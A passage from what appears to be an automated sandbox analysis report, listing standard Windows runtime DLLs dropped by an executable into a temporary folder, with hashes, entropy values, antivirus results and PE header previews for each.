                                                                                                                                                                                                                      MD5:B98598657162DE8FBC1536568F1E5A4F
                                                                                                                                                                                                                      SHA1:F7C020220025101638FD690D86C53D895A03E53C
                                                                                                                                                                                                                      SHA-256:F596C72BE43DB3A722B7C7A0FD3A4D5AEA68267003986FBFD278702AF88EFA74
                                                                                                                                                                                                                      SHA-512:AD5F46A3F4F6E64A5DCB85C328F1B8DAEFA94FC33F59922328FDCFEDC04A8759F16A1A839027F74B7D7016406C20AC47569277620D6B909E09999021B669A0D6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...V............ ...................A..............8............................................................................rdata..l...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-synch-l1-2-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.091480115020503
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:ntZ3lWEhWFJ7QpBj0HRN7DdC8QHRN7cSIlexF:pa7qWDdC88c6H
                                                                                                                                                                                                                      MD5:B751571148923D943F828A1DEB459E24
                                                                                                                                                                                                                      SHA1:D4160404C2AA6AEAF3492738F5A6CE476A0584A6
                                                                                                                                                                                                                      SHA-256:B394B1142D060322048FB6A8AC6281E4576C0E37BE8DA772BC970F352DD22A20
                                                                                                                                                                                                                      SHA-512:26E252FF0C01E1E398EBDDCC5683A58CDD139161F2B63B65BDE6C3E943E85C0820B24486859C2C597AF6189DE38CA7FE6FA700975BE0650CB53C791CD2481C9D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......?.....`.........................................`...v............ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20760
                                                                                                                                                                                                                      Entropy (8bit):7.031246620579023
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:rB2WEhWC5oQpBj0HRN7xQHRN7sbSIlexe:rBs1aqWx8868
                                                                                                                                                                                                                      MD5:8AEA681E0E2B9ABBF73A924003247DBB
                                                                                                                                                                                                                      SHA1:5BAFC2E0A3906723F9B12834B054E6F44D7FF49F
                                                                                                                                                                                                                      SHA-256:286068A999FE179EE91B289360DD76E89365900B130A50E8651A9B7ECE80B36D
                                                                                                                                                                                                                      SHA-512:08C83A729036C94148D9A5CBC03647FA2ADEA4FBA1BBB514C06F85CA804EEFBF36C909CB6EDC1171DA8D4D5E4389E15E52571BAA6987D1F1353377F509E269AB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......5....`.........................................`...E............ ...................A..............8............................................................................rdata..\...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-timezone-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.126809628880692
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:DPWEhWcG6SJxHW65FdQpBjSdHnhWgN7a8Wcb8W65FdQHnhWgN7a8Wbv8p2kacqnd:LWEhWP6yQpBj0HRN7reQHRN7c8pUclXM
                                                                                                                                                                                                                      MD5:EAB486E4719B916CAD05D64CD4E72E43
                                                                                                                                                                                                                      SHA1:876C256FB2AEB0B25A63C9EE87D79B7A3C157EAD
                                                                                                                                                                                                                      SHA-256:05FE96FAA8429992520451F4317FBCEBA1B17716FA2CAF44DDC92EDE88CE509D
                                                                                                                                                                                                                      SHA-512:C50C3E656CC28A2F4F6377BA24D126BDC248A3125DCA490994F8CACE0A4903E23346AE937BB5B0A333F7D39ECE42665AE44FDE2FD5600873489F3982151A0F5D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-util-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.050436266578937
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:VPWEhWcAQIqyW65FdQpBjSdHnhWgN7a8Wcx/YaWW65FdQHnhWgN7a8Wu08p2kacE:dWEhWxqEQpBj0HRN7FwQHRN7k8pUclXS
                                                                                                                                                                                                                      MD5:EDD61FF85D75794DC92877F793A2CEF6
                                                                                                                                                                                                                      SHA1:DE9F1738FC8BF2D19AA202E34512EC24C1CCB635
                                                                                                                                                                                                                      SHA-256:8ACA888849E9089A3A56FA867B16B071951693AB886843CFB61BD7A5B08A1ECE
                                                                                                                                                                                                                      SHA-512:6CEF9B256CDCA1A401971CA5706ADF395961B2D3407C1FFF23E6C16F7E2CE6D85D946843A53532848FCC087C18009C08F651C6EB38112778A2B4B33E8C64796C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......k....`.........................................`...9............ ...................A..............8............................................................................rdata..L...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-conio-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20760
                                                                                                                                                                                                                      Entropy (8bit):7.043213792651867
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:0N+WEhW+FQpBj0HRN7N7rJQHRN7YSIlexs:ZjqW1rJ8Y6e
                                                                                                                                                                                                                      MD5:22BFE210B767A667B0F3ED692A536E4E
                                                                                                                                                                                                                      SHA1:88E0FF9C141D8484B5E34EAAA5E4BE0B414B8ADF
                                                                                                                                                                                                                      SHA-256:F1A2499CC238E52D69C63A43D1E61847CF852173FE95C155056CFBD2CB76ABC3
                                                                                                                                                                                                                      SHA-512:CBEA3C690049A73B1A713A2183FF15D13B09982F8DD128546FD3DB264AF4252CCD390021DEE54435F06827450DA4BD388BD6FF11B084C0B43D50B181C928FD25
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......i....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-convert-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):23832
                                                                                                                                                                                                                      Entropy (8bit):6.893758159434215
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:ODyuWEhWjlQpBj0HRN7ubJlUQHRN7sXhlhOq:qMqWuzU8lq
                                                                                                                                                                                                                      MD5:DA5E087677C8EBBC0062EAC758DFED49
                                                                                                                                                                                                                      SHA1:CA69D48EFA07090ACB7AE7C1608F61E8D26D3985
                                                                                                                                                                                                                      SHA-256:08A43A53A66D8ACB2E107E6FC71213CEDD180363055A2DC5081FE5A837940DCE
                                                                                                                                                                                                                      SHA-512:6262E9A0808D8F64E5F2DFAD5242CD307E2F5EAA78F0A768F325E65C98DB056C312D79F0B3E63C74E364AF913A832C1D90F4604FE26CC5FB05F3A5A661B12573
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................@............`.........................................`................0...................A..............8............................................................................rdata..............................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-environment-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.034562111482961
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:I8PWEhWck+4cW65FdQpBjSdHnhWgN7a8Wcl4zKW65FdQHnhWgN7a8W5kX5mzVEMq:9WEhWi4+QpBj0HRN71/QHRN7ckwCMllO
                                                                                                                                                                                                                      MD5:33A0FE1943C5A325F93679D6E9237FEE
                                                                                                                                                                                                                      SHA1:737D2537D602308FC022DBC0C29AA607BCDEC702
                                                                                                                                                                                                                      SHA-256:5AF7AA065FFDBF98D139246E198601BFDE025D11A6C878201F4B99876D6C7EAC
                                                                                                                                                                                                                      SHA-512:CAB7FCAA305A9ACE1F1CC7077B97526BEBC0921ADF23273E74CD42D7FE99401D4F7EDE8ECB9847B6734A13760B9EBE4DBD2465A3DB3139ED232DBEF68FB62C54
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......y....`.........................................`..."............ ...................A..............8............................................................................rdata..<...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21784
                                                                                                                                                                                                                      Entropy (8bit):7.046057210626605
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:h81nWm5CcWEhWke9HQpBj0HRN7KQhv2kQHRN7yAXOVlTnG:hOnWm5C6DMHqWKmuk8pb
                                                                                                                                                                                                                      MD5:633DCA52DA4EBAA6F4BF268822C6DC88
                                                                                                                                                                                                                      SHA1:1EBFC0F881CE338D2F66FCC3F9C1CBB94CDC067E
                                                                                                                                                                                                                      SHA-256:424FD5D3D3297A8AB1227007EF8DED5A4F194F24BD573A5211BE71937AA55D22
                                                                                                                                                                                                                      SHA-512:ED058525EE7B4CC7E12561C7D674C26759A4301322FF0B3239F3183911CE14993614E3199D8017B9BFDE25C8CB9AC0990D318BB19F3992624B39EC0F084A8DF1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......."....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-heap-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20760
                                                                                                                                                                                                                      Entropy (8bit):7.011889321604509
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:eQWEhWxFQpBj0HRN7o8/QHRN7/cPcSIlexP:eWGqWo8/8/l6B
                                                                                                                                                                                                                      MD5:43BF2037BFD3FB60E1FEDAC634C6F86E
                                                                                                                                                                                                                      SHA1:959EEBE41D905AD3AFA4254A52628EC13613CF70
                                                                                                                                                                                                                      SHA-256:735703C0597DA278AF8A6359FC051B9E657627F50AD5B486185C2EF328AD571B
                                                                                                                                                                                                                      SHA-512:7042846C009EFEA45CA5FAFDC08016ECA471A8C54486BA03F212ABBA47467F8744E9546C8F33214620F97DBCC994E3002788AD0DB65B86D8A3E4FF0D8A9D0D05
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..(...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-locale-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.08402114712403
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:29DWEhWXFQpBj0HRN7lbQHRN7s8SIlexeXC:kkqWN8L6cXC
                                                                                                                                                                                                                      MD5:D51BC845C4EFBFDBD68E8CCFFDAD7375
                                                                                                                                                                                                                      SHA1:C82E580EC68C48E613C63A4C2F9974BB59182CF6
                                                                                                                                                                                                                      SHA-256:89D9F54E6C9AE1CB8F914DA1A2993A20DE588C18F1AAF4D66EFB20C3A282C866
                                                                                                                                                                                                                      SHA-512:2E353CF58AD218C3E068A345D1DA6743F488789EF7C6B96492D48571DC64DF8A71AD2DB2E5976CFD04CF4B55455E99C70C7F32BD2C0F4A8BED1D29C2DAFC17B0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......].....`.........................................`...e............ ...................A..............8............................................................................rdata..|...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-math-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):28952
                                                                                                                                                                                                                      Entropy (8bit):6.688687241998293
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:wZVacWM4Oe59Ckb1hgmLiWEhW1e9HQpBj0HRN7O2KQHRN7w3kclsHMkZT:wZVJWMq59Bb1jQuMHqWOz8Akx
                                                                                                                                                                                                                      MD5:487F72D0CF7DC1D85FA18788A1B46813
                                                                                                                                                                                                                      SHA1:0AABFF6D4EE9A2A56D40EE61E4591D4BA7D14C0D
                                                                                                                                                                                                                      SHA-256:560BAF1B87B692C284CCBB82F2458A688757231B315B6875482E08C8F5333B3D
                                                                                                                                                                                                                      SHA-512:B7F4E32F98BFDCF799331253FAEBB1FB08EC24F638D8526F02A6D9371C8490B27D03DB3412128CED6D2BBB11604247F3F22C8380B1BF2A11FB3BB92F18980185
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........,...............................................P.......%....`.........................................`....%...........@...............0...A..............8............................................................................rdata...&.......(..................@..@.rsrc........@.......,..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-process-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20760
                                                                                                                                                                                                                      Entropy (8bit):7.028263219925353
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:JitIlWEhWO5oQpBj0HRN7BXVQHRN7DEp1x09lgezq:w6paqWz8Apsm
                                                                                                                                                                                                                      MD5:54A8FCA040976F2AAC779A344B275C80
                                                                                                                                                                                                                      SHA1:EA1F01D6DCDF688EB0F21A8CB8A38F03BC777883
                                                                                                                                                                                                                      SHA-256:7E90E7ACC69ACA4591CE421C302C7F6CDF8E44F3B4390F66EC43DFF456FFEA29
                                                                                                                                                                                                                      SHA-512:CB20BED4972E56F74DE1B7BC50DC1E27F2422DBB302AECB749018B9F88E3E4A67C9FC69BBBB8C4B21D49A530CC8266172E7D237650512AAFB293CDFE06D02228
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...x............ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):24344
                                                                                                                                                                                                                      Entropy (8bit):6.897926491070706
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:B42r77WEhWCFQpBj0HRN7SQHRN7oSIlexw40:B42r7DrqWS8o6x0
                                                                                                                                                                                                                      MD5:21B509D048418922B92985696710AFCA
                                                                                                                                                                                                                      SHA1:C499DD098AAB8C7E05B8B0FD55F994472D527203
                                                                                                                                                                                                                      SHA-256:FE7336D2FB3B13A00B5B4CE055A84F0957DAEFDACE94F21B88E692E54B678AC3
                                                                                                                                                                                                                      SHA-512:C517B02D4E94CF8360D98FD093BCA25E8AE303C1B4500CF4CF01F78A7D7EF5F581B99A0371F438C6805A0B3040A0E06994BA7B541213819BD07EC8C6251CB9BB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................@......~.....`.........................................`...4............0...................A..............8............................................................................rdata..H...........................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):25880
                                                                                                                                                                                                                      Entropy (8bit):6.843889819511554
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:z3vAmiFVhFWEhWGqQpBj0HRN79XJQHRN7/SCMllJXq:zvYjoqW958/ga
                                                                                                                                                                                                                      MD5:120A5DC2682CD2A838E0FC0EFD45506E
                                                                                                                                                                                                                      SHA1:8710BE5D5E9C878669FF8B25B67FB2DEB32CD77A
                                                                                                                                                                                                                      SHA-256:C14F0D929A761A4505628C4EB5754D81B88AA1FDAD2154A2F2B0215B983B6D89
                                                                                                                                                                                                                      SHA-512:4330EDF9B84C541E5ED3BB672548F35EFA75C6B257C3215FC29BA6E152294820347517EC9BD6BDE38411EFA9074324A276CF0D7D905ED5DD88E906D78780760C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." ......... ...............................................@............`.........................................`...a............0...............$...A..............8............................................................................rdata..t...........................@..@.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-string-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):25880
                                                                                                                                                                                                                      Entropy (8bit):6.8416401850774395
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:p5yguNvZ5VQgx3SbwA71IkFZpMHqW74W8Lipsy:p5yguNvZ5VQgx3SbwA71IipMR747fy
                                                                                                                                                                                                                      MD5:F22FACA49E4D5D80EC26ED31E7ECD0E0
                                                                                                                                                                                                                      SHA1:473BCBFB78E6A63AFD720B5CBE5C55D9495A3D88
                                                                                                                                                                                                                      SHA-256:1EB30EA95DAE91054A33A12B1C73601518D28E3746DB552D7CE120DA589D4CF4
                                                                                                                                                                                                                      SHA-512:C8090758435F02E3659D303211D78102C71754BA12B0A7E25083FD3529B3894DC3AB200B02A2899418CC6ED3B8F483D36E6C2BF86CE2A34E5FD9AD0483B73040
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." ......... ...............................................@............`.........................................`................0...............$...A..............8............................................................................rdata..............................@..@.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-time-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22296
                                                                                                                                                                                                                      Entropy (8bit):6.97368865913958
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:SPEzaWEhW/slQpBj0HRN7sVQHRN7gkclsHTyt:Y0YRqWg8jyt
                                                                                                                                                                                                                      MD5:2FD0DA47811B8ED4A0ABDF9030419381
                                                                                                                                                                                                                      SHA1:46E3F21A9BD31013A804BA45DC90CC22331A60D1
                                                                                                                                                                                                                      SHA-256:DE81C4D37833380A1C71A5401DE3AB4FE1F8856FC40D46D0165719A81D7F3924
                                                                                                                                                                                                                      SHA-512:2E6F900628809BFD908590FE1EA38E0E36960235F9A6BBCCB73BBB95C71BFD10F75E1DF5E8CF93A682E4ADA962B06C278AFC9123AB5A4117F77D1686FF683D6F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-utility-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.0800725103781765
                                                                                                                                                                                                                      Encrypted:false
